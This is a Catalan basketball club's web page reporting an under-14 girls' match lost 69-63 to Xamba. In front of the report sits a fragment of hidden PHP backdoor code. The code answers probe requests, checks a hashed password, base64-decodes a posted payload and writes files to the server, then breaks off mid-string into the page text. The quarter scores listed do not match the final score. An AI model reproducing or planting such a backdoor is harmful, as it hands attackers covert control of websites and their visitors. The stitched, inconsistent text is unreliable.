function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'Infantil Fem 10A comença la 2a volta amb un gran partit (69-63) - Tgn Bàsquet Club -

L’Infantil Fem 10A comença la 2a volta amb un gran partit (69-63)

Updated: gener 16, 2024

Primer partit de la segona volta en el qual el TGN va visitar la pista del Xamba de Vilafranca. El partit va tenir un ritme molt alt on tots dos equips van atacar amb molta velocitat. La primera part va ser molt igualada pero en el tercer quart el Xamba va trencar el partit amb un parcial de 20-7. En l’últim quart el TGN Bàsquet va intentar remontar el partit però tot i l’esforç no va ser possible. Molt bon partit del TGN que no va aconseguir emportar-se la victòria final. A seguir endevant LILES!

MINECAL – C.E. XAMBA: 69  – TGN BÀSQUET 10A: 63

PARCIALS: 15-20, 10-21, 20-7, 15-15

MINECAL – C.E. XAMBA: Esclasans (8), Millan (6), Trullas (10), Badia (2) i Delgado (9)—cinc inicial— Manso (3), Tort (-), Pla (17), Estevez (4) i Sanchez (10).

LES XIFRES DEL PARTIT: 6/18 tirs lliures | 14 faltes

TGN BÀSQUET 10A: Valls (9), Porta (10), Ramon (4), Dominguez (18), Sentis (5) —cinc inicial— Romeu (5), Aluja (8), Bueso (2) i Parera (2).

LES XIFRES DEL PARTIT: 10/20 tirs lliures | 17 faltes